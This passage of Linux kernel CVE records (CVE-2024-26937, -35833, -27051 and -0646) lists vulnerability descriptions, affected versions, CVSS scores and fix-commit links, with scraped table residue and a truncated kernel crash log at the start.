1)) - 1))\n\u003c0\u003e[ 166.210781] Dumping ftrace buffer:\n\u003c0\u003e[ 166.210795] ---------------------------------\n...\n\u003c0\u003e[ 167.302811] drm_fdin-1097 2..s1. 165741070us : trace_ports: 0000:00:02.0 rcs0: promote { ccid:20 1217:2 prio 0 }\n\u003c0\u003e[ 167.302861] drm_fdin-1097 2d.s2. 165741072us : execlists_submission_tasklet: 0000:00:02.0 rcs0: preempting last=1217:2, prio=0, hint=2147483646\n\u003c0\u003e[ 167.302928] drm_fdin-1097 2d.s2. 165741072us : __i915_request_unsubmit: 0000:00:02.0 rcs0: fence 1217:2, current 0\n\u003c0\u003e[ 167.302992] drm_fdin-1097 2d.s2. 165741073us : __i915_request_submit: 0000:00:02.0 rcs0: fence 3:4660, current 4659\n\u003c0\u003e[ 167.303044] drm_fdin-1097 2d.s1. 165741076us : execlists_submission_tasklet: 0000:00:02.0 rcs0: context:3 schedule-in, ccid:40\n\u003c0\u003e[ 167.303095] drm_fdin-1097 2d.s1. 165741077us : trace_ports: 0000:00:02.0 rcs0: submit { ccid:40 3:4660* prio 2147483646 }\n\u003c0\u003e[ 167.303159] kworker/-89 11..... 165741139us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence c90:2, current 2\n\u003c0\u003e[ 167.303208] kworker/-89 11..... 165741148us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:c90 unpin\n\u003c0\u003e[ 167.303272] kworker/-89 11..... 165741159us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 1217:2, current 2\n\u003c0\u003e[ 167.303321] kworker/-89 11..... 165741166us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:1217 unpin\n\u003c0\u003e[ 167.303384] kworker/-89 11..... 165741170us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 3:4660, current 4660\n\u003c0\u003e[ 167.303434] kworker/-89 11d..1. 165741172us : __intel_context_retire: 0000:00:02.0 rcs0: context:1216 retire runtime: { total:56028ns, avg:56028ns }\n\u003c0\u003e[ 167.303484] kworker/-89 11..... 165741198us : __engine_park: 0000:00:02.0 rcs0: parked\n\u003c0\u003e[ 167.303534] \u003cidle\u003e-0 5d.H3. 165741207us : execlists_irq_handler: 0000:00:02.0 rcs0: semaphore yield: 00000040\n\u003c0\u003e[ 167.303583] kworker/-89 11..... 165741397us : __intel_context_retire: 0000:00:02.0 rcs0: context:1217 retire runtime: { total:325575ns, avg:0ns }\n\u003c0\u003e[ 167.303756] kworker/-89 11..... 165741777us : __intel_context_retire: 0000:00:02.0 rcs0: context:c90 retire runtime: { total:0ns, avg:0ns }\n\u003c0\u003e[ 167.303806] kworker/-89 11..... 165742017us : __engine_park: __engine_park:283 GEM_BUG_ON(engine-\u003esched_engine-\u003equeue_priority_hint != (-((int)(~0U \u003e\u003e 1)) - 1))\n\u003c0\u003e[ 167.303811] ---------------------------------\n\u003c4\u003e[ 167.304722] ------------[ cut here ]------------\n\u003c2\u003e[ 167.304725] kernel BUG at drivers/gpu/drm/i915/gt/intel_engine_pm.c:283!\n\u003c4\u003e[ 167.304731] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\n\u003c4\u003e[ 167.304734] CPU: 11 PID: 89 Comm: kworker/11:1 Tainted: G W 6.8.0-rc2-CI_DRM_14193-gc655e0fd2804+ #1\n\u003c4\u003e[ 167.304736] Hardware name: Intel Corporation Rocket Lake Client Platform/RocketLake S UDIMM 6L RVP, BIOS RKLSFWI1.R00.3173.A03.2204210138 04/21/2022\n\u003c4\u003e[ 167.304738] Workqueue: i915-unordered retire_work_handler [i915]\n\u003c4\u003e[ 16\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:11.088Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/67944e6db656bf1e986aa2a359f866f851091f8a"
},
{
"url": "https://git.kernel.org/stable/c/fe34587acc995e7b1d7a5d3444a0736721ec32b3"
},
{
"url": "https://git.kernel.org/stable/c/ac9b6b3e8d1237136c8ebf0fa1ce037dd7e2948f"
},
{
"url": "https://git.kernel.org/stable/c/7eab7b021835ae422c38b968d5cc60e99408fb62"
},
{
"url": "https://git.kernel.org/stable/c/3b031e4fcb2740988143c303f81f69f18ce86325"
},
{
"url": "https://git.kernel.org/stable/c/aed034866a08bb7e6e34d50a5629a4d23fe83703"
},
{
"url": "https://git.kernel.org/stable/c/8fd9b0ce8c26533fe4d5d15ea15bbf7b904b611c"
},
{
"url": "https://git.kernel.org/stable/c/4a3859ea5240365d21f6053ee219bb240d520895"
}
],
"title": "drm/i915/gt: Reset queue_priority_hint on parking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26937",
"datePublished": "2024-05-01T05:17:35.555Z",
"dateReserved": "2024-02-19T14:20:24.196Z",
"dateUpdated": "2025-05-04T09:00:11.088Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35833 (GCVE-0-2024-35833)
Vulnerability from cvelistv5
Published
2024-05-17 13:48
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fsl-qdma: Fix a memory leak related to the queue command DMA
This dma_alloc_coherent() is undone neither in the remove function, nor in
the error handling path of fsl_qdma_probe().
Switch to the managed version to fix both issues.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35833",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:42:15.309549Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:28:55.561Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.443Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c75fe450b5200c78f4a102a0eb8e15d8f1ccda8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae6769ba51417c1c86fb645812d5bff455eee802"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/15eb996d7d13cb72a16389231945ada8f0fef2c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25ab4d72eb7cbfa0f3d97a139a9b2bfcaa72dd59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cd8a51517ce15edbdcea4fc74c4c127ddaa1bd6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/198270de9d8eb3b5d5f030825ea303ef95285d24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3aa58cb51318e329d203857f7a191678e60bb714"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1c75fe450b5200c78f4a102a0eb8e15d8f1ccda8",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "ae6769ba51417c1c86fb645812d5bff455eee802",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "15eb996d7d13cb72a16389231945ada8f0fef2c3",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "25ab4d72eb7cbfa0f3d97a139a9b2bfcaa72dd59",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "5cd8a51517ce15edbdcea4fc74c4c127ddaa1bd6",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "198270de9d8eb3b5d5f030825ea303ef95285d24",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "3aa58cb51318e329d203857f7a191678e60bb714",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: fsl-qdma: Fix a memory leak related to the queue command DMA\n\nThis dma_alloc_coherent() is undone neither in the remove function, nor in\nthe error handling path of fsl_qdma_probe().\n\nSwitch to the managed version to fix both issues."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:25.326Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1c75fe450b5200c78f4a102a0eb8e15d8f1ccda8"
},
{
"url": "https://git.kernel.org/stable/c/ae6769ba51417c1c86fb645812d5bff455eee802"
},
{
"url": "https://git.kernel.org/stable/c/15eb996d7d13cb72a16389231945ada8f0fef2c3"
},
{
"url": "https://git.kernel.org/stable/c/25ab4d72eb7cbfa0f3d97a139a9b2bfcaa72dd59"
},
{
"url": "https://git.kernel.org/stable/c/5cd8a51517ce15edbdcea4fc74c4c127ddaa1bd6"
},
{
"url": "https://git.kernel.org/stable/c/198270de9d8eb3b5d5f030825ea303ef95285d24"
},
{
"url": "https://git.kernel.org/stable/c/3aa58cb51318e329d203857f7a191678e60bb714"
}
],
"title": "dmaengine: fsl-qdma: Fix a memory leak related to the queue command DMA",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35833",
"datePublished": "2024-05-17T13:48:24.319Z",
"dateReserved": "2024-05-17T12:19:12.349Z",
"dateUpdated": "2025-05-04T09:06:25.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27051 (GCVE-0-2024-27051)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cpufreq: brcmstb-avs-cpufreq: add check for cpufreq_cpu_get's return value
cpufreq_cpu_get may return NULL. To avoid NULL-dereference check it
and return 0 in case of error.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 Version: de322e085995b9417582d6f72229dadb5c09d163 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27051",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T16:15:35.545255Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:03.499Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9127599c075caff234359950117018a010dd01db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d951cf510fb0df91d3abac0121a59ebbc63c0567"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e72160cb6e23b78b41999d6885a34ce8db536095"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b25b64a241d769e932a022e5c780cf135ef56035"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74b84d0d71180330efe67c82f973a87f828323e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6e3e51ffba0784782b1a076d7441605697ea3c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f661017e6d326ee187db24194cabb013d81bc2a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/cpufreq/brcmstb-avs-cpufreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9127599c075caff234359950117018a010dd01db",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "d951cf510fb0df91d3abac0121a59ebbc63c0567",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "e72160cb6e23b78b41999d6885a34ce8db536095",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "b25b64a241d769e932a022e5c780cf135ef56035",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "74b84d0d71180330efe67c82f973a87f828323e5",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "e6e3e51ffba0784782b1a076d7441605697ea3c6",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
},
{
"lessThan": "f661017e6d326ee187db24194cabb013d81bc2a6",
"status": "affected",
"version": "de322e085995b9417582d6f72229dadb5c09d163",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/cpufreq/brcmstb-avs-cpufreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: brcmstb-avs-cpufreq: add check for cpufreq_cpu_get\u0027s return value\n\ncpufreq_cpu_get may return NULL. To avoid NULL-dereference check it\nand return 0 in case of error.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:09.536Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9127599c075caff234359950117018a010dd01db"
},
{
"url": "https://git.kernel.org/stable/c/d951cf510fb0df91d3abac0121a59ebbc63c0567"
},
{
"url": "https://git.kernel.org/stable/c/e72160cb6e23b78b41999d6885a34ce8db536095"
},
{
"url": "https://git.kernel.org/stable/c/b25b64a241d769e932a022e5c780cf135ef56035"
},
{
"url": "https://git.kernel.org/stable/c/74b84d0d71180330efe67c82f973a87f828323e5"
},
{
"url": "https://git.kernel.org/stable/c/e6e3e51ffba0784782b1a076d7441605697ea3c6"
},
{
"url": "https://git.kernel.org/stable/c/f661017e6d326ee187db24194cabb013d81bc2a6"
}
],
"title": "cpufreq: brcmstb-avs-cpufreq: add check for cpufreq_cpu_get\u0027s return value",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27051",
"datePublished": "2024-05-01T12:54:39.024Z",
"dateReserved": "2024-02-19T14:20:24.213Z",
"dateUpdated": "2025-05-04T09:03:09.536Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-0646 (GCVE-0-2024-0646)
Vulnerability from cvelistv5
Published
2024-01-17 15:16
Modified
2025-11-06 20:51
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-787 - Out-of-bounds Write
Summary
An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Version: 0 ≤ |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:11:35.718Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0850",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0850"
},
{
"name": "RHSA-2024:0851",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0851"
},
{
"name": "RHSA-2024:0876",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0876"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1251",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1251"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1368",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1368"
},
{
"name": "RHSA-2024:1377",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1377"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
